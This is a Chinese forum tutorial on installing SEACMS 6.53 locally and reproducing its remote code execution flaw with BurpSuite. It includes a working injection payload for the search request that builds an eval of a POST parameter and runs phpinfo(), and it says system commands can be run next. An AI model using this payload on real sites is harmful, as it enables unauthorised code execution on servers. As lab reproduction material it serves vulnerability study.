title
菜鸟吧 首页 站长学堂 seacms教程 查看内容

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用

2024-11-8 20:28| 发布者: admin| 查看: 1| 评论: 0|原作者: 菜鸟哥

摘要: mysql+php 用phpstudy即可下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中包里有安装说明0x01 开始复现安装完毕后进入主页设置代理127.0.0.1 8080端口…… ...

mysql+php 用phpstudy即可

下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中

包里有安装说明

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用


0x01 开始复现

安装完毕后进入主页

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用


设置代理127.0.0.1 8080端口, 打开BurpSuite抓包

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用


这里直接用网上的poc

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

我们复制过来看看效果

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用


改好直接forward 过我们看下效果

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用


0x02 漏洞利用

进一步利用,可以执行系统命令

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用

海洋CMS(SEACMS 6.53)环境搭建及漏洞利用



路过

雷人

握手

鲜花

鸡蛋

最新评论

Archiver 手机版 小黑屋 网站地图

Copyright © 2015-2026 菜鸟吧论坛 |找资源研究学习当然上菜鸟吧论坛

警告:本站所有资源收集世界互联网,请下载后24小时之内删除,否則後果自負!
WARNING: ‌All resources from the web. Delete within 24 hours or consequences at your own risk!
郑重声明:站内所有资源均来自互联网或会员投稿发布, 如果侵犯了权益请联系删除,E-mail:cainiaovip8@qq.com 商用请购买正版。

返回顶部